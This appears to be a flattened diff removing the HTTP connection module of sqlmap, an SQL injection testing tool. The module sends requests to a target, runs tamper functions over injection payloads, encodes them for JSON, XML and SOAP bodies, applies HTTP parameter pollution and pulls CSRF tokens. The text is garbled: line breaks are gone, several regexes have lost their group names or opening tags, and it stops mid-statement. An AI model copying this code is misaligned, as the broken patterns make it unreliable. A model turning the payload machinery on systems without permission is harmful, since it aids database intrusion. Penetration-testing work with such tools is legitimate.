extra.safe2bin.safe2bin import safecharencode -from lib.core.agent import agent -from lib.core.common import asciifyUrl -from lib.core.common import calculateDeltaSeconds -from lib.core.common import clearConsoleLine -from lib.core.common import cpuThrottle -from lib.core.common import dataToStdout -from lib.core.common import evaluateCode -from lib.core.common import extractRegexResult -from lib.core.common import findMultipartPostBoundary -from lib.core.common import getCurrentThreadData -from lib.core.common import getHeader -from lib.core.common import getHostHeader -from lib.core.common import getRequestHeader -from lib.core.common import getSafeExString -from lib.core.common import getUnicode -from lib.core.common import logHTTPTraffic -from lib.core.common import pushValue -from lib.core.common import popValue -from lib.core.common import randomizeParameterValue -from lib.core.common import randomInt -from lib.core.common import randomStr -from lib.core.common import readInput -from lib.core.common import removeReflectiveValues -from lib.core.common import singleTimeLogMessage -from lib.core.common import singleTimeWarnMessage -from lib.core.common import stdev -from lib.core.common import wasLastResponseDelayed -from lib.core.common import unicodeencode -from lib.core.common import urldecode -from lib.core.common import urlencode -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.dicts import POST_HINT_CONTENT_TYPES -from lib.core.enums import ADJUST_TIME_DELAY -from lib.core.enums import AUTH_TYPE -from lib.core.enums import CUSTOM_LOGGING -from lib.core.enums import HTTP_HEADER -from lib.core.enums import HTTPMETHOD -from lib.core.enums import NULLCONNECTION -from lib.core.enums import PAYLOAD -from lib.core.enums import PLACE -from lib.core.enums import POST_HINT -from lib.core.enums import REDIRECTION -from lib.core.enums import WEB_API -from lib.core.exception import SqlmapCompressionException -from lib.core.exception import SqlmapConnectionException -from lib.core.exception import SqlmapGenericException -from lib.core.exception import SqlmapSyntaxException -from lib.core.exception import SqlmapTokenException -from lib.core.exception import SqlmapValueException -from lib.core.settings import ASTERISK_MARKER -from lib.core.settings import BOUNDARY_BACKSLASH_MARKER -from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR -from lib.core.settings import DEFAULT_CONTENT_TYPE -from lib.core.settings import DEFAULT_COOKIE_DELIMITER -from lib.core.settings import DEFAULT_GET_POST_DELIMITER -from lib.core.settings import EVALCODE_KEYWORD_SUFFIX -from lib.core.settings import HTTP_ACCEPT_HEADER_VALUE -from lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE -from lib.core.settings import MAX_CONNECTION_CHUNK_SIZE -from lib.core.settings import MAX_CONNECTIONS_REGEX -from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE -from lib.core.settings import META_REFRESH_REGEX -from lib.core.settings import MIN_TIME_RESPONSES -from lib.core.settings import IS_WIN -from lib.core.settings import LARGE_CHUNK_TRIM_MARKER -from lib.core.settings import PAYLOAD_DELIMITER -from lib.core.settings import PERMISSION_DENIED_REGEX -from lib.core.settings import PLAIN_TEXT_CONTENT_TYPE -from lib.core.settings import RANDOM_INTEGER_MARKER -from lib.core.settings import RANDOM_STRING_MARKER -from lib.core.settings import REPLACEMENT_MARKER -from lib.core.settings import TEXT_CONTENT_TYPE_REGEX -from lib.core.settings import UNENCODED_ORIGINAL_VALUE -from lib.core.settings import URI_HTTP_HEADER -from lib.core.settings import WARN_TIME_STDEV -from lib.request.basic import decodePage -from lib.request.basic import forgeHeaders -from lib.request.basic import processResponse -from lib.request.direct import direct -from lib.request.comparison import comparison -from lib.request.methodrequest import MethodRequest -from thirdparty.multipart import multipartpost -from thirdparty.odict.odict import OrderedDict -from thirdparty.socks.socks import ProxyError - - -class Connect(object): - """ - This class defines methods used to perform HTTP requests - """ - - @staticmethod - def _getPageProxy(**kwargs): - return Connect.getPage(**kwargs) - - @staticmethod - def _retryProxy(**kwargs): - threadData = getCurrentThreadData() - threadData.retriesCount += 1 - - if conf.proxyList and threadData.retriesCount >= conf.retries: - warnMsg = "changing proxy" - logger.warn(warnMsg) - - conf.proxy = None - threadData.retriesCount = 0 - - setHTTPHandlers() - - if kb.testMode and kb.previousMethod == PAYLOAD.METHOD.TIME: - # timed based payloads can cause web server unresponsiveness - # if the injectable piece of code is some kind of JOIN-like query - warnMsg = "most probably web server instance hasn't recovered yet " - warnMsg += "from previous timed based payload. If the problem " - warnMsg += "persists please wait for few minutes and rerun " - warnMsg += "without flag T in option '--technique' " - warnMsg += "(e.g. '--flush-session --technique=BEUS') or try to " - warnMsg += "lower the value of option '--time-sec' (e.g. '--time-sec=2')" - singleTimeWarnMessage(warnMsg) - - elif kb.originalPage is None: - if conf.tor: - warnMsg = "please make sure that you have " - warnMsg += "Tor installed and running so " - warnMsg += "you could successfully use " - warnMsg += "switch '--tor' " - if IS_WIN: - warnMsg += "(e.g. 'https://www.torproject.org/download/download.html.en')" - else: - warnMsg += "(e.g. 'https://help.ubuntu.com/community/Tor')" - else: - warnMsg = "if the problem persists please check that the provided " - warnMsg += "target URL is valid. In case that it is, you can try to rerun " - warnMsg += "with the switch '--random-agent' turned on " - warnMsg += "and/or proxy switches ('--ignore-proxy', '--proxy',...)" - singleTimeWarnMessage(warnMsg) - - elif conf.threads > 1: - warnMsg = "if the problem persists please try to lower " - warnMsg += "the number of used threads (option '--threads')" - singleTimeWarnMessage(warnMsg) - - kwargs['retrying'] = True - return Connect._getPageProxy(**kwargs) - - @staticmethod - def _connReadProxy(conn): - retVal = "" - - if not kb.dnsMode and conn: - headers = conn.info() - if headers and hasattr(headers, "getheader") and (headers.getheader(HTTP_HEADER.CONTENT_ENCODING, "").lower() in ("gzip", "deflate")\ - or "text" not in headers.getheader(HTTP_HEADER.CONTENT_TYPE, "").lower()): - retVal = conn.read(MAX_CONNECTION_TOTAL_SIZE) - if len(retVal) == MAX_CONNECTION_TOTAL_SIZE: - warnMsg = "large compressed response detected. Disabling compression" - singleTimeWarnMessage(warnMsg) - kb.pageCompress = False - else: - while True: - if not conn: - break - else: - _ = conn.read(MAX_CONNECTION_CHUNK_SIZE) - - if len(_) == MAX_CONNECTION_CHUNK_SIZE: - warnMsg = "large response detected. This could take a while" - singleTimeWarnMessage(warnMsg) - _ = re.sub(r"(?si)%s.+?%s" % (kb.chars.stop, kb.chars.start), "%s%s%s" % (kb.chars.stop, LARGE_CHUNK_TRIM_MARKER, kb.chars.start), _) - retVal += _ - else: - retVal += _ - break - - if len(retVal) > MAX_CONNECTION_TOTAL_SIZE: - warnMsg = "too large response detected. Automatically trimming it" - singleTimeWarnMessage(warnMsg) - break - - return retVal - - @staticmethod - def getPage(**kwargs): - """ - This method connects to the target URL or proxy and returns - the target URL page content - """ - - if isinstance(conf.delay, (int, float)) and conf.delay > 0: - time.sleep(conf.delay) - elif conf.cpuThrottle: - cpuThrottle(conf.cpuThrottle) - - if conf.offline: - return None, None, None - elif conf.dummy: - return getUnicode(randomStr(int(randomInt()), alphabet=[chr(_) for _ in xrange(256)]), {}, int(randomInt())), None, None - - threadData = getCurrentThreadData() - with kb.locks.request: - kb.requestCounter += 1 - threadData.lastRequestUID = kb.requestCounter - - url = kwargs.get("url", None) or conf.url - get = kwargs.get("get", None) - post = kwargs.get("post", None) - method = kwargs.get("method", None) - cookie = kwargs.get("cookie", None) - ua = kwargs.get("ua", None) or conf.agent - referer = kwargs.get("referer", None) or conf.referer - host = kwargs.get("host", None) or conf.host - direct_ = kwargs.get("direct", False) - multipart = kwargs.get("multipart", False) - silent = kwargs.get("silent", False) - raise404 = kwargs.get("raise404", True) - timeout = kwargs.get("timeout", None) or conf.timeout - auxHeaders = kwargs.get("auxHeaders", None) - response = kwargs.get("response", False) - ignoreTimeout = kwargs.get("ignoreTimeout", False) or kb.ignoreTimeout - refreshing = kwargs.get("refreshing", False) - retrying = kwargs.get("retrying", False) - crawling = kwargs.get("crawling", False) - skipRead = kwargs.get("skipRead", False) - - websocket_ = url.lower().startswith("ws") - - if not urlparse.urlsplit(url).netloc: - url = urlparse.urljoin(conf.url, url) - - # flag to know if we are dealing with the same target host - target = reduce(lambda x, y: x == y, map(lambda x: urlparse.urlparse(x).netloc.split(':')[0], [url, conf.url or ""])) - - if not retrying: - # Reset the number of connection retries - threadData.retriesCount = 0 - - # fix for known issue when urllib2 just skips the other part of provided - # url splitted with space char while urlencoding it in the later phase - url = url.replace(" ", "%20") - - conn = None - code = None - page = None - - _ = urlparse.urlsplit(url) - requestMsg = u"HTTP request [#%d]:\n%s " % (threadData.lastRequestUID, method or (HTTPMETHOD.POST if post is not None else HTTPMETHOD.GET)) - requestMsg += ("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else "")) if not any((refreshing, crawling)) else url - responseMsg = u"HTTP response " - requestHeaders = u"" - responseHeaders = None - logHeaders = u"" - skipLogTraffic = False - - raise404 = raise404 and not kb.ignoreNotFound - - # support for non-latin (e.g. cyrillic) URLs as urllib/urllib2 doesn't - # support those by default - url = asciifyUrl(url) - - try: - socket.setdefaulttimeout(timeout) - - if direct_: - if '?' in url: - url, params = url.split('?', 1) - params = urlencode(params) - url = "%s?%s" % (url, params) - - elif multipart: - # Needed in this form because of potential circle dependency - # problem (option -> update -> connect -> option) - from lib.core.option import proxyHandler - - multipartOpener = urllib2.build_opener(proxyHandler, multipartpost.MultipartPostHandler) - conn = multipartOpener.open(unicodeencode(url), multipart) - page = Connect._connReadProxy(conn) if not skipRead else None - responseHeaders = conn.info() - responseHeaders[URI_HTTP_HEADER] = conn.geturl() - page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE)) - - return page - - elif any((refreshing, crawling)): - pass - - elif target: - if conf.forceSSL and urlparse.urlparse(url).scheme != "https": - url = re.sub("\Ahttp:", "https:", url, re.I) - url = re.sub(":80/", ":443/", url, re.I) - - if PLACE.GET in conf.parameters and not get: - get = conf.parameters[PLACE.GET] - - if not conf.skipUrlEncode: - get = urlencode(get, limit=True) - - if get: - if '?' in url: - url = "%s%s%s" % (url, DEFAULT_GET_POST_DELIMITER, get) - requestMsg += "%s%s" % (DEFAULT_GET_POST_DELIMITER, get) - else: - url = "%s?%s" % (url, get) - requestMsg += "?%s" % get - - if PLACE.POST in conf.parameters and not post and method != HTTPMETHOD.GET: - post = conf.parameters[PLACE.POST] - - elif get: - url = "%s?%s" % (url, get) - requestMsg += "?%s" % get - - requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str - - # Prepare HTTP headers - headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie, HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer, HTTP_HEADER.HOST: host}) - - if HTTP_HEADER.COOKIE in headers: - cookie = headers[HTTP_HEADER.COOKIE] - - if kb.authHeader: - headers[HTTP_HEADER.AUTHORIZATION] = kb.authHeader - - if kb.proxyAuthHeader: - headers[HTTP_HEADER.PROXY_AUTHORIZATION] = kb.proxyAuthHeader - - if not getHeader(headers, HTTP_HEADER.ACCEPT): - headers[HTTP_HEADER.ACCEPT] = HTTP_ACCEPT_HEADER_VALUE - - if not getHeader(headers, HTTP_HEADER.HOST) or not target: - headers[HTTP_HEADER.HOST] = getHostHeader(url) - - if not getHeader(headers, HTTP_HEADER.ACCEPT_ENCODING): - headers[HTTP_HEADER.ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE if kb.pageCompress else "identity" - - if post is not None and not getHeader(headers, HTTP_HEADER.CONTENT_TYPE): - headers[HTTP_HEADER.CONTENT_TYPE] = POST_HINT_CONTENT_TYPES.get(kb.postHint, DEFAULT_CONTENT_TYPE) - - if headers.get(HTTP_HEADER.CONTENT_TYPE) == POST_HINT_CONTENT_TYPES[POST_HINT.MULTIPART]: - warnMsg = "missing 'boundary parameter' in '%s' header. " % HTTP_HEADER.CONTENT_TYPE - warnMsg += "Will try to reconstruct" - singleTimeWarnMessage(warnMsg) - - boundary = findMultipartPostBoundary(conf.data) - if boundary: - headers[HTTP_HEADER.CONTENT_TYPE] = "%s; boundary=%s" % (headers[HTTP_HEADER.CONTENT_TYPE], boundary) - - # Reset header values to original in case of provided request file - if target and conf.requestFile: - headers = OrderedDict(conf.httpHeaders) - if cookie: - headers[HTTP_HEADER.COOKIE] = cookie - - if auxHeaders: - for key, value in auxHeaders.items(): - for _ in headers.keys(): - if _.upper() == key.upper(): - del headers[_] - headers[key] = value - - for key, value in headers.items(): - del headers[key] - value = unicodeencode(value, kb.pageEncoding) - for char in (r"\r", r"\n"): - value = re.sub(r"(%s)([^ \t])" % char, r"\g<1>\t\g<2>", value) - headers[unicodeencode(key, kb.pageEncoding)] = value.strip("\r\n") - - url = unicodeencode(url) - post = unicodeencode(post) - - if websocket_: - ws = websocket.WebSocket() - ws.connect(url, header=("%s: %s" % _ for _ in headers.items() if _[0] not in ("Host",)), cookie=cookie) # WebSocket will add Host field of headers automatically - ws.send(urldecode(post or "")) - page = ws.recv() - ws.close() - code = ws.status - status = httplib.responses[code] - class _(dict): - pass - responseHeaders = _(ws.getheaders()) - responseHeaders.headers = ["%s: %s\r\n" % (_[0].capitalize(), _[1]) for _ in responseHeaders.items()] - - requestHeaders += "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()) - requestMsg += "\n%s" % requestHeaders - - if post is not None: - requestMsg += "\n\n%s" % getUnicode(post) - - requestMsg += "\n" - - threadData.lastRequestMsg = requestMsg - - logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) - else: - if method and method not in (HTTPMETHOD.GET, HTTPMETHOD.POST): - method = unicodeencode(method) - req = MethodRequest(url, post, headers) - req.set_method(method) - else: - req = urllib2.Request(url, post, headers) - - requestHeaders += "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in req.header_items()) - - if not getRequestHeader(req, HTTP_HEADER.COOKIE) and conf.cj: - conf.cj._policy._now = conf.cj._now = int(time.time()) - cookies = conf.cj._cookies_for_request(req) - requestHeaders += "\n%s" % ("Cookie: %s" % ";".join("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value)) for cookie in cookies)) - - if post is not None: - if not getRequestHeader(req, HTTP_HEADER.CONTENT_LENGTH): - requestHeaders += "\n%s: %d" % (string.capwords(HTTP_HEADER.CONTENT_LENGTH), len(post)) - - if not getRequestHeader(req, HTTP_HEADER.CONNECTION): - requestHeaders += "\n%s: close" % HTTP_HEADER.CONNECTION - - requestMsg += "\n%s" % requestHeaders - - if post is not None: - requestMsg += "\n\n%s" % getUnicode(post) - - requestMsg += "\n" - - threadData.lastRequestMsg = requestMsg - - logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) - - if conf.cj: - for cookie in conf.cj: - if cookie.value is None: - cookie.value = "" - else: - for char in (r"\r", r"\n"): - cookie.value = re.sub(r"(%s)([^ \t])" % char, r"\g<1>\t\g<2>", cookie.value) - - conn = urllib2.urlopen(req) - - if not kb.authHeader and getRequestHeader(req, HTTP_HEADER.AUTHORIZATION) and (conf.authType or "").lower() == AUTH_TYPE.BASIC.lower(): - kb.authHeader = getRequestHeader(req, HTTP_HEADER.AUTHORIZATION) - - if not kb.proxyAuthHeader and getRequestHeader(req, HTTP_HEADER.PROXY_AUTHORIZATION): - kb.proxyAuthHeader = getRequestHeader(req, HTTP_HEADER.PROXY_AUTHORIZATION) - - # Return response object - if response: - return conn, None, None - - # Get HTTP response - if hasattr(conn, 'redurl'): - page = (threadData.lastRedirectMsg[1] if kb.redirectChoice == REDIRECTION.NO\ - else Connect._connReadProxy(conn)) if not skipRead else None - skipLogTraffic = kb.redirectChoice == REDIRECTION.NO - code = conn.redcode - else: - page = Connect._connReadProxy(conn) if not skipRead else None - - code = code or conn.code - responseHeaders = conn.info() - responseHeaders[URI_HTTP_HEADER] = conn.geturl() - page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE)) - status = getUnicode(conn.msg) - - if extractRegexResult(META_REFRESH_REGEX, page) and not refreshing: - refresh = extractRegexResult(META_REFRESH_REGEX, page) - - debugMsg = "got HTML meta refresh header" - logger.debug(debugMsg) - - if kb.alwaysRefresh is None: - msg = "sqlmap got a refresh request " - msg += "(redirect like response common to login pages). " - msg += "Do you want to apply the refresh " - msg += "from now on (or stay on the original page)? [Y/n]" - choice = readInput(msg, default="Y") - - kb.alwaysRefresh = choice not in ("n", "N") - - if kb.alwaysRefresh: - if re.search(r"\Ahttps?://", refresh, re.I): - url = refresh - else: - url = urlparse.urljoin(url, refresh) - - threadData.lastRedirectMsg = (threadData.lastRequestUID, page) - kwargs['refreshing'] = True - kwargs['url'] = url - kwargs['get'] = None - kwargs['post'] = None - - try: - return Connect._getPageProxy(**kwargs) - except SqlmapSyntaxException: - pass - - # Explicit closing of connection object - if conn and not conf.keepAlive: - try: - if hasattr(conn.fp, '_sock'): - conn.fp._sock.close() - conn.close() - except Exception, ex: - warnMsg = "problem occurred during connection closing ('%s')" % getSafeExString(ex) - logger.warn(warnMsg) - - except urllib2.HTTPError, ex: - page = None - responseHeaders = None - - try: - page = ex.read() if not skipRead else None - responseHeaders = ex.info() - responseHeaders[URI_HTTP_HEADER] = ex.geturl() - page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE)) - except socket.timeout: - warnMsg = "connection timed out while trying " - warnMsg += "to get error page information (%d)" % ex.code - logger.warn(warnMsg) - return None, None, None - except KeyboardInterrupt: - raise - except: - pass - finally: - page = page if isinstance(page, unicode) else getUnicode(page) - - code = ex.code - - kb.originalCode = kb.originalCode or code - threadData.lastHTTPError = (threadData.lastRequestUID, code) - kb.httpErrorCodes[code] = kb.httpErrorCodes.get(code, 0) + 1 - - status = getUnicode(ex.msg) - responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status) - - if responseHeaders: - logHeaders = "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()) - - logHTTPTraffic(requestMsg, "%s%s\n\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE])) - - skipLogTraffic = True - - if conf.verbose <= 5: - responseMsg += getUnicode(logHeaders) - elif conf.verbose > 5: - responseMsg += "%s\n\n%s" % (logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE]) - - logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) - - if ex.code == httplib.UNAUTHORIZED and not conf.ignore401: - errMsg = "not authorized, try to provide right HTTP " - errMsg += "authentication type and valid credentials (%d)" % code - raise SqlmapConnectionException(errMsg) - elif ex.code == httplib.NOT_FOUND: - if raise404: - errMsg = "page not found (%d)" % code - raise SqlmapConnectionException(errMsg) - else: - debugMsg = "page not found (%d)" % code - singleTimeLogMessage(debugMsg, logging.DEBUG) - processResponse(page, responseHeaders) - elif ex.code == httplib.GATEWAY_TIMEOUT: - if ignoreTimeout: - return None, None, None - else: - warnMsg = "unable to connect to the target URL (%d - %s)" % (ex.code, httplib.responses[ex.code]) - if threadData.retriesCount < conf.retries and not kb.threadException: - warnMsg += ". sqlmap is going to retry the request" - logger.critical(warnMsg) - return Connect._retryProxy(**kwargs) - elif kb.testMode: - logger.critical(warnMsg) - return None, None, None - else: - raise SqlmapConnectionException(warnMsg) - else: - debugMsg = "got HTTP error code: %d (%s)" % (code, status) - logger.debug(debugMsg) - - except (urllib2.URLError, socket.error, socket.timeout, httplib.HTTPException, struct.error, binascii.Error, ProxyError, SqlmapCompressionException, WebSocketException, TypeError): - tbMsg = traceback.format_exc() - - if "no host given" in tbMsg: - warnMsg = "invalid URL address used (%s)" % repr(url) - raise SqlmapSyntaxException(warnMsg) - elif "forcibly closed" in tbMsg or "Connection is already closed" in tbMsg: - warnMsg = "connection was forcibly closed by the target URL" - elif "timed out" in tbMsg: - singleTimeWarnMessage("turning off pre-connect mechanism because of connection time out(s)") - conf.disablePrecon = True - - if kb.testMode and kb.testType not in (None, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED): - singleTimeWarnMessage("there is a possibility that the target (or WAF) is dropping 'suspicious' requests") - warnMsg = "connection timed out to the target URL" - elif "URLError" in tbMsg or "error" in tbMsg: - warnMsg = "unable to connect to the target URL" - elif "NTLM" in tbMsg: - warnMsg = "there has been a problem with NTLM authentication" - elif "BadStatusLine" in tbMsg: - warnMsg = "connection dropped or unknown HTTP " - warnMsg += "status code received" - if not conf.agent and not conf.randomAgent: - warnMsg += ". Try to force the HTTP User-Agent " - warnMsg += "header with option '--user-agent' or switch '--random-agent'" - elif "IncompleteRead" in tbMsg: - warnMsg = "there was an incomplete read error while retrieving data " - warnMsg += "from the target URL" - elif "Handshake status" in tbMsg: - status = re.search("Handshake status ([\d]{3})", tbMsg) - errMsg = "websocket handshake status %s" % status.group(1) if status else "unknown" - raise SqlmapConnectionException(errMsg) - else: - warnMsg = "unable to connect to the target URL" - - if "BadStatusLine" not in tbMsg: - warnMsg += " or proxy" - - if silent: - return None, None, None - elif "forcibly closed" in tbMsg: - logger.critical(warnMsg) - return None, None, None - elif ignoreTimeout and any(_ in tbMsg for _ in ("timed out", "IncompleteRead")): - return None, None, None - elif threadData.retriesCount < conf.retries and not kb.threadException: - warnMsg += ". sqlmap is going to retry the request" - if not retrying: - warnMsg += "(s)" - logger.critical(warnMsg) - else: - logger.debug(warnMsg) - return Connect._retryProxy(**kwargs) - elif kb.testMode: - logger.critical(warnMsg) - return None, None, None - else: - raise SqlmapConnectionException(warnMsg) - - finally: - if isinstance(page, basestring) and not isinstance(page, unicode): - if HTTP_HEADER.CONTENT_TYPE in (responseHeaders or {}) and not re.search(TEXT_CONTENT_TYPE_REGEX, responseHeaders[HTTP_HEADER.CONTENT_TYPE]): - page = unicode(page, errors="ignore") - else: - page = getUnicode(page) - socket.setdefaulttimeout(conf.timeout) - - processResponse(page, responseHeaders) - - if conn and getattr(conn, "redurl", None): - _ = urlparse.urlsplit(conn.redurl) - _ = ("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else "")) - requestMsg = re.sub("(\n[A-Z]+ ).+?( HTTP/\d)", "\g<1>%s\g<2>" % getUnicode(_).replace("\\", "\\\\"), requestMsg, 1) - - if kb.resendPostOnRedirect is False: - requestMsg = re.sub("(\[#\d+\]:\n)POST ", "\g<1>GET ", requestMsg) - requestMsg = re.sub("(?i)Content-length: \d+\n", "", requestMsg) - requestMsg = re.sub("(?s)\n\n.+", "\n", requestMsg) - - responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, conn.code, status) - else: - responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status) - - if responseHeaders: - logHeaders = "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()) - - if not skipLogTraffic: - logHTTPTraffic(requestMsg, "%s%s\n\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE])) - - if conf.verbose <= 5: - responseMsg += getUnicode(logHeaders) - elif conf.verbose > 5: - responseMsg += "%s\n\n%s" % (logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE]) - - logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) - - return page, responseHeaders, code - - @staticmethod - def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True): - """ - This method calls a function to get the target URL page content - and returns its page MD5 hash or a boolean value in case of - string match check ('--string' command line parameter) - """ - - if conf.direct: - return direct(value, content) - - get = None - post = None - cookie = None - ua = None - referer = None - host = None - page = None - pageLength = None - uri = None - code = None - - if not place: - place = kb.injection.place or PLACE.GET - - if not auxHeaders: - auxHeaders = {} - - raise404 = place != PLACE.URI if raise404 is None else raise404 - method = method or conf.method - - value = agent.adjustLateValues(value) - payload = agent.extractPayload(value) - threadData = getCurrentThreadData() - - if conf.httpHeaders: - headers = OrderedDict(conf.httpHeaders) - contentType = max(headers[_] if _.upper() == HTTP_HEADER.CONTENT_TYPE.upper() else None for _ in headers.keys()) - - if (kb.postHint or conf.skipUrlEncode) and kb.postUrlEncode: - kb.postUrlEncode = False - conf.httpHeaders = [_ for _ in conf.httpHeaders if _[1] != contentType] - contentType = POST_HINT_CONTENT_TYPES.get(kb.postHint, PLAIN_TEXT_CONTENT_TYPE) - conf.httpHeaders.append((HTTP_HEADER.CONTENT_TYPE, contentType)) - - if payload: - if kb.tamperFunctions: - for function in kb.tamperFunctions: - try: - payload = function(payload=payload, headers=auxHeaders) - except Exception, ex: - errMsg = "error occurred while running tamper " - errMsg += "function '%s' ('%s')" % (function.func_name, getSafeExString(ex)) - raise SqlmapGenericException(errMsg) - - if not isinstance(payload, basestring): - errMsg = "tamper function '%s' returns " % function.func_name - errMsg += "invalid payload type ('%s')" % type(payload) - raise SqlmapValueException(errMsg) - - value = agent.replacePayload(value, payload) - - logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload.replace('\\', BOUNDARY_BACKSLASH_MARKER)).replace(BOUNDARY_BACKSLASH_MARKER, '\\')) - - if place == PLACE.CUSTOM_POST and kb.postHint: - if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML): - # payloads in SOAP/XML should have chars > and < replaced - # with their HTML encoded counterparts - payload = payload.replace('>', ">").replace('<', "<") - elif kb.postHint == POST_HINT.JSON: - if payload.startswith('"') and payload.endswith('"'): - payload = json.dumps(payload[1:-1]) - else: - payload = json.dumps(payload)[1:-1] - elif kb.postHint == POST_HINT.JSON_LIKE: - payload = payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"') - if payload.startswith('"') and payload.endswith('"'): - payload = json.dumps(payload[1:-1]) - else: - payload = json.dumps(payload)[1:-1] - payload = payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"') - value = agent.replacePayload(value, payload) - else: - # GET, POST, URI and Cookie payload needs to be thoroughly URL encoded - if place in (PLACE.GET, PLACE.URI, PLACE.COOKIE) and not conf.skipUrlEncode or place in (PLACE.POST, PLACE.CUSTOM_POST) and kb.postUrlEncode: - payload = urlencode(payload, '%', False, place != PLACE.URI) # spaceplus is handled down below - value = agent.replacePayload(value, payload) - - if conf.hpp: - if not any(conf.url.lower().endswith(_.lower()) for _ in (WEB_API.ASP, WEB_API.ASPX)): - warnMsg = "HTTP parameter pollution should work only against " - warnMsg += "ASP(.NET) targets" - singleTimeWarnMessage(warnMsg) - if place in (PLACE.GET, PLACE.POST): - _ = re.escape(PAYLOAD_DELIMITER) - match = re.search("(?P\w+)=%s(?P.+?)%s" % (_, _), value) - if match: - payload = match.group("value") - - for splitter in (urlencode(' '), ' '): - if splitter in payload: - prefix, suffix = ("*/", "/*") if splitter == ' ' else (urlencode(_) for _ in ("*/", "/*")) - parts = payload.split(splitter) - parts[0] = "%s%s" % (parts[0], suffix) - parts[-1] = "%s%s=%s%s" % (DEFAULT_GET_POST_DELIMITER, match.group("name"), prefix, parts[-1]) - for i in xrange(1, len(parts) - 1): - parts[i] = "%s%s=%s%s%s" % (DEFAULT_GET_POST_DELIMITER, match.group("name"), prefix, parts[i], suffix) - payload = "".join(parts) - - for splitter in (urlencode(','), ','): - payload = payload.replace(splitter, "%s%s=" % (DEFAULT_GET_POST_DELIMITER, match.group("name"))) - - value = agent.replacePayload(value, payload) - else: - warnMsg = "HTTP parameter pollution works only with regular " - warnMsg += "GET and POST parameters" - singleTimeWarnMessage(warnMsg) - - if place: - value = agent.removePayloadDelimiters(value) - - if PLACE.GET in conf.parameters: - get = conf.parameters[PLACE.GET] if place != PLACE.GET or not value else value - - if PLACE.POST in conf.parameters: - post = conf.parameters[PLACE.POST] if place != PLACE.POST or not value else value - - if PLACE.CUSTOM_POST in conf.parameters: - post = conf.parameters[PLACE.CUSTOM_POST].replace(CUSTOM_INJECTION_MARK_CHAR, "") if place != PLACE.CUSTOM_POST or not value else value - post = post.replace(ASTERISK_MARKER, '*') if post else post - - if PLACE.COOKIE in conf.parameters: - cookie = conf.parameters[PLACE.COOKIE] if place != PLACE.COOKIE or not value else value - - if PLACE.USER_AGENT in conf.parameters: - ua = conf.parameters[PLACE.USER_AGENT] if place != PLACE.USER_AGENT or not value else value - - if PLACE.REFERER in conf.parameters: - referer = conf.parameters[PLACE.REFERER] if place != PLACE.REFERER or not value else value - - if PLACE.HOST in conf.parameters: - host = conf.parameters[PLACE.HOST] if place != PLACE.HOST or not value else value - - if PLACE.URI in conf.parameters: - uri = conf.url if place != PLACE.URI or not value else value - else: - uri = conf.url - - if value and place == PLACE.CUSTOM_HEADER: - auxHeaders[value.split(',')[0]] = value.split(',', 1)[1] - - if conf.csrfToken: - def _adjustParameter(paramString, parameter, newValue): - retVal = paramString - match = re.search("%s=(?P[^&]*)" % re.escape(parameter), paramString) - if match: - retVal = re.sub("%s=[^&]*" % re.escape(parameter), "%s=%s" % (parameter, newValue), paramString) - return retVal - - page, headers, code = Connect.getPage(url=conf.csrfUrl or conf.url, data=conf.data if conf.csrfUrl == conf.url else None, method=conf.method if conf.csrfUrl == conf.url else None, cookie=conf.parameters.get(PLACE.COOKIE), direct=True, silent=True, ua=conf.parameters.get(PLACE.USER_AGENT), referer=conf.parameters.get(PLACE.REFERER), host=conf.parameters.get(PLACE.HOST)) - match = re.search(r"]+name=[\"']?%s[\"']?\s[^>]*value=(\"([^\"]+)|'([^']+)|([^ >]+))" % re.escape(conf.csrfToken), page or "") - token = (match.group(2) or match.group(3) or match.group(4)) if match else None - - if not token: - if conf.csrfUrl != conf.url and code == httplib.OK: - if headers and "text/plain" in headers.get(HTTP_HEADER.CONTENT_TYPE, ""): - token = page - - if not 